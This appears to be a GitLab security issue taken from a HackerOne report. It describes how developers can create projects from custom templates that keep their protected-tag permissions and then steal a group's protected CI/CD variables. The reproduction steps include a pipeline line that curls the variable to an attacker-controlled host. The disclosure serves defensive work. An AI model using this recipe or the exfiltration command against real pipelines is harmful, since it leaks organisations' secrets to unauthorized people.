Developers can steal group's CI/CD variables using custom project templates

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2450288 by js_noob on 2024-04-06, assigned to @cmaxim:

Report | Attachments | How To Reproduce

Report

This report is almost the same as #2431500, the team closed it without providing sufficient details, I responded but didn't get any attention, probably because it's closed. I still believe this is a high bug, so reporting again to get more details/clarifications.

The only change here is that the create from template feature in a group for developers is okay, where I though it wasn't in the last report, however, this doesn't change the impact of this.

Summary

Hello team, when a project is created using a custom template, the permission for protected branches is reset to maintainers, even if the settings in the template project allowed anyone to push to protected branches this setting is reset to only allow maintainers, this is mainly done when the import is done by someone that's not the owner.

I searched a lot in the docs, but this is not documented anywhere, this is done in:

And this can be easily verified by a couple of tests.

This is okay and better for security. But for protected tags, it's not, and it's just being persistent from the "original" template project (this is obvious in the below example/POC).
So a developer can create a project from a template that allows developers to create protected tags, in a group allowing him to steal that group's protected CI/CD variables.
This can be easily done by creating a new branch with malicious code and applying a protected tag to it, which triggers the "protected" pipeline, allowing it to steal them.

Steps to reproduce

The below is just a simple scenario of how this can be exploited, but there are a lot many, and I can provide POCs for others if requested.

As an owner:

  1. Create a group and apply the ultimate trial to it
  2. Create 2 subgroups in that group let's call them, projects and templates
  3. Navigate to https://gitlab.com/groups/MAIN_GROUP/-/edit and under "Custom project templates", select the templates subgroup
  4. In the projects group, create a protected var called VAR with any value. We'll be stealing this later
  5. Invite USER_2 as a maintainer to the templates group, and as a developer to the projects group

As User 2:

  1. In the templates group, create a new project, while having the following content in the .gitlab-ci.yml file
my_job:  
    script:  
        - "curl -X GET https://evil_doman.com?VAR=$VAR"
  1. In that project, create a protected tag wildcard target in https://gitlab.com/MAIN_GROUP/templates/PROJECT/-/settings/repository, make sure to allow developers + maintainers to create, something similar to

Screenshot_2024-03-23_at_2.17.50_AM.png
8. Navigate to the projects group, create a project from a template, to the group section, and create a new project from the template you created in the templates group (this shouldn't be allowed)
9. Create a new protected tag, and verify that the pipeline is triggered on that protected tag
10. Verify that the protected variable is sent to the attacker's controlled server

Example

Screen_Recording_2024-03-23_at_2.28.24_AM.mov

What is the current bug behavior?

Developers can create projects using custom templates.

What is the expected correct behavior?

Developers shouldn't be able to create projects using custom templates.

Output of checks

This bug happens on GitLab.com

Impact

Disclosure of a group's CI/CD variables to unauthorized users (developers).

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: